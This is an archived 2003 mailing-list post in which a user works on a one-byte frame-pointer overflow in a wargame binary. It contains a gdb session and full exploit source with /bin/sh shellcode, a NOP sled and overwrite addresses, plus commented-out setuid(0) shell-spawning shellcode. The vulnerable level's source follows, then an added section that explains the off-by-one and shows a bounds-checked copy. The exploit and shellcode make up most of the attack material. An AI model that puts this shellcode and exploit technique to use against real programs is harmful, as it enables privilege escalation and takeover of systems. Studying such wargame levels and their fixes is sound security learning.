Vulnerability Development mailing list archives
Fake frame overwriting
From: joe <moj0e () terra com br>
Date: Tue, 30 Sep 2003 20:21:13 -0300
Earlier I posted a problem I was having with executing code by overwriting EBP. I almost have it working... It's just one peculiar problem that I am dealing with.
Let me post the gdb output and it might be clear to you.

[joe@localhostpital wargame]$ gdb ./bof15 core.15254
GNU gdb 5.3-22mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...(no debugging symbols found)...
Core was generated by `./bof15 '.
Program terminated with signal 4, Illegal instruction.
Reading symbols from /lib/i686/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x40155f50 in sys_sigabbrev () from /lib/i686/libc.so.6
(gdb) break *0xbffff880
Breakpoint 1 at 0xbffff880
(gdb) x 0xbffff880
0xbffff880:     0x90909090
(gdb) run $VULN
########################
# W4rCr0-21 - LEVEL XV #
########################
- Yeah, right!!!

(no debugging symbols found)...
Breakpoint 1, 0xbffff880 in ?? ()
(gdb) x 0xbffff880
0xbffff880:     0x90909090
(gdb) x/100 0xbffff880
0xbffff880:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff890:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8d0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff900:     0x90909090      0x90909090      0x46b0c029      0x0cb3db29
0xbffff910:     0x890ceb80      0xeb80cdd9      0xc0295e18      0x89074688
0xbffff920:     0x76890c46      0x870bb008      0x084b8df3      0xcd0c538d
0xbffff930:     0xffe3e880      0x622fffff      0x732f6e69      0xfff88068
0xbffff940:     0xfff880bf      0xfff880bf      0xfff880bf      0x787878bf
0xbffff950:     0x78787878      0x4c007878      0x4b535345      0x2f3d5945
0xbffff960:     0x2f637465      0x73656c2e      0x434c0073      0x5041505f
0xbffff970:     0x703d5245      0x52425f74      0x5f434c00      0x52444441
0xbffff980:     0x3d535345      0x425f7470      0x434c0052      0x4e4f4d5f
0xbffff990:     0x52415445      0x74703d59      0x0052425f      0x54534f48
0xbffff9a0:     0x454d414e      0x636f6c3d      0x6f686c61      0x69707473
0xbffff9b0:     0x006c6174      0x4d524554      0x6574783d      0x53006d72
0xbffff9c0:     0x4c4c4548      0x69622f3d      0x61622f6e      0x48006873
0xbffff9d0:     0x53545349      0x3d455a49      0x30303031      0x414d5700
0xbffff9e0:     0x5f52454b      0x5f4e4942      0x454d414e      0x2d746c3d
0xbffff9f0:     0x6b616d77      0x4c007265      0x554e5f43      0x4952454d
0xbffffa00:     0x74703d43      0x0052425f      0x52455355      0x656f6a3d
(gdb) c
Continuing.
Die: DW_TAG_formal_parameter (abbrev = 41, offset = 11608)
        has children: FALSE
        attributes:
                DW_AT_name (DW_FORM_string) string: "sym"
                DW_AT_decl_file (DW_FORM_data1) constant: 33
                DW_AT_decl_line (DW_FORM_data2) constant: 365
                DW_AT_type (DW_FORM_ref4) constant: 9043
Dwarf Error: Cannot find type of die.
(gdb) c
Continuing.
sh-2.05b$ exit
exit

Program exited normally.
(gdb)

As you can see, it actually executes my shellcode (running sh-2.05b). However, it seems to die first... When I run it outside of gdb, it causes an Illegal instruction.
Thanx for all your help!

j0e
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

char sc_linux[] =                 ///home/joe/code/wargames/dome
    "\x29\xc0\xb0\x46\x29\xdb"
    "\xb3\x0c\x80\xeb\x0c\x89"
    "\xd9\xcd\x80\xeb\x18\x5e"
    "\x29\xc0\x88\x46\x07\x89"
    "\x46\x0c\x89\x76\x08\xb0"
    "\x0b\x87\xf3\x8d\x4b\x08"
    "\x8d\x53\x0c\xcd\x80\xe8"
    "\xe3\xff\xff\xff\x2f\x62"
    "\x69\x6e\x2f\x73\x68";

/*
    "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
    "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
    "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
    "\xff\xff\x01\x2f\x68\x6f\x6d\x65\x2f\x6a\x6f\x65"
    "\x2f\x63\x6f\x64\x65\x2f\x77\x61\x72\x67\x61\x6d"
    "\x65\x2f\x64\x6f\x6d\x65\x01";
*/

// "\x31\xdb"              /* xor %ebx,%ebx */
// "\x89\xd8"              /* mov %ebx,%eax */
// "\xb0\x17"              /* mov $0x17,%al */
// "\xcd\x80"              /* int $0x80 */
/* setuid(0); */
// "\x31\xdb"              /* xor %ebx,%ebx */
// "\x89\xd8"              /* mov %ebx,%eax */
// "\xb0\x17"              /* mov $0x17,%al */
// "\xcd\x80"              /* int $0x80 */
/* setgid(0); */
// "\x31\xdb"              /* xor %ebx,%ebx */
// "\x89\xd8"              /* mov %ebx,%eax */
// "\xb0\x2e"              /* mov $0x2e,%al */
// "\xcd\x80"              /* int $0x80 */
/* /bin/sh execve(); */
// "\x31\xc0"              /* xor %eax,%eax */
// "\x50"                  /* push %eax */
// "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f */
// "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f */
// "\x89\xe3"              /* mov %esp,%ebx */
// "\x50"                  /* push %eax */
// "\x53"                  /* push %ebx */
// "\x89\xe1"              /* mov %esp,%ecx */
// "\x31\xd2"              /* xor %edx,%edx */
// "\xb0\x0b"              /* mov $0xb,%al */
// "\xcd\x80"
// "\x90\x90"              /* int $0x80 */
// "\x90\x90";
/* exit(0); */
// "\x31\xdb"              /* xor %ebx,%ebx */
// "\x89\xd8"              /* mov %ebx,%eax */
// "\xb0\x01"              /* mov $0x01,%al */
// "\xcd\x80";             /* int $0x80 */

/* Original shell code....
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
    "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
    "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
    "\xd7\xff\xff\xff/bin/sh";
*/

int main(void)
{
    int i, j, t;
    char buffer[1024];

    bzero(&buffer, 1024);

    for (i=0;i<=(252-sizeof(sc_linux)-20);i++) {
        buffer[i] = 0x90;
    }
    for (j=0,i=i;j<(sizeof(sc_linux)-1);i++,j++) {
        buffer[i] = sc_linux[j];
    }
    for(t=0; t < 4;t++ ){
        buffer[i++] = 0x80;  //10 0x80498cc
        buffer[i++] = 0xf8;  // Address of our buffer f6
        buffer[i++] = 0xff;  // ff
        buffer[i++] = 0xbf;  //bf
    }
    for(t=0; t < 9; t++) {
        buffer[i++] = 0x78;  // overflowchar
    }

    setenv("VULN",buffer,1);
    system("bash");
    return 0;
}
Attachment: bof15
Description:

/*
    W4rCr0-21 - LEVEL XV
    coded by DownBload

    TIP: One byte to rule them all??? (deja-vu???:)))
*/

#include <stdio.h>
#include <stdlib.h>

void do_me (char *tralala)
{
    char name[256];
    int x;

    for (x=0;x<=256;x++)
        name[x] = tralala[x];
}

int main (int argc, char **argv)
{
    system ("/usr/bin/clear");
    printf ("########################\n");
    printf ("# W4rCr0-21 - LEVEL XV #\n");
    printf ("########################\n");
    printf ("- Yeah, right!!!\n\n");

    if (argc == 1) {
        printf ("> Are you a real hacker????\n");
        exit(0);
    }

    do_me(argv[1]);
    printf ("> No, you are not a real hacker, you are hidiot :)))");
    return 0;
}
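The defect in the attached level is the `<=` in the copy loop of do_me(): it writes byte index 256 into a 256-byte buffer, and on the real stack that single extra byte lands in whatever the compiler placed directly after name[] (the "one byte" of the level's hint). The example below is added here and is not code from the post or from the level's author; it models that layout with a guard byte in a struct so the overrun can be observed safely, and puts a bounds-checked copy beside it. The struct, the guard value, the function names and the 257-byte input are all constructed for the demonstration.

```c
/* Added example, not part of the original post or the wargame level.
 * Models the off-by-one in do_me() beside a bounds-checked replacement. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define NAME_SIZE 256

/* Constructed stand-in for the level's stack frame: a 256-byte buffer with
 * one byte placed directly after it.  In the real binary the byte after
 * name[] is part of the saved frame pointer; here a guard byte takes its
 * place so the overrun is visible without corrupting anything. */
struct frame_model {
    char name[NAME_SIZE];
    unsigned char guard;
};

/* The level's loop bound, unchanged: `x <= NAME_SIZE` performs NAME_SIZE + 1
 * writes.  Writes go through a byte pointer to the struct (name[] sits at
 * offset 0) so that touching the guard stays within one object. */
void copy_original(struct frame_model *f, const char *src)
{
    unsigned char *dst = (unsigned char *)f;   /* == (unsigned char *)f->name */
    int x;
    for (x = 0; x <= NAME_SIZE; x++)
        dst[x] = (unsigned char)src[x];
}

/* Bounds-checked replacement: copies at most NAME_SIZE - 1 bytes, always
 * NUL-terminates, never reads past NAME_SIZE bytes of src, and reports
 * truncation (returns 1) instead of silently overrunning. */
int copy_fixed(struct frame_model *f, const char *src)
{
    size_t len = 0;
    int truncated;

    while (len < NAME_SIZE && src[len] != '\0')
        len++;
    truncated = (len == NAME_SIZE);
    if (truncated)
        len = NAME_SIZE - 1;

    memcpy(f->name, src, len);
    f->name[len] = '\0';
    return truncated;
}

/* Runs both copies against a constructed 257-byte argument (the shortest
 * input that reaches the extra write).  Returns 1 when the original loop
 * changed the guard byte, the fixed copy left it intact, and the fixed copy
 * reported truncation; 0 otherwise. */
int demonstrate_overrun(void)
{
    static char arg[NAME_SIZE + 2];      /* 257 'A's plus a terminator */
    struct frame_model f;
    const unsigned char sentinel = 0xEE; /* constructed guard value */
    int original_clobbered, fixed_clobbered, truncated;

    memset(arg, 'A', NAME_SIZE + 1);
    arg[NAME_SIZE + 1] = '\0';

    f.guard = sentinel;
    copy_original(&f, arg);
    original_clobbered = (f.guard != sentinel);   /* guard now holds 'A' */

    f.guard = sentinel;
    truncated = copy_fixed(&f, arg);
    fixed_clobbered = (f.guard != sentinel);      /* guard untouched */

    return original_clobbered && !fixed_clobbered && truncated;
}

int main(void)
{
    if (demonstrate_overrun())
        printf("original loop overwrote the byte after name[]; fixed copy did not\n");
    else
        printf("unexpected result\n");
    return 0;
}
```

The guard byte plays the role that the saved frame pointer plays in the real binary: one byte past the array is exactly what the level's loop reaches, and a copy that bounds both its reads and its writes and reports truncation removes that write entirely.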
Current thread:
- Fake frame overwriting joe (Oct 01)
- <Possible follow-ups>
- Re: Fake frame overwriting joe (Oct 01)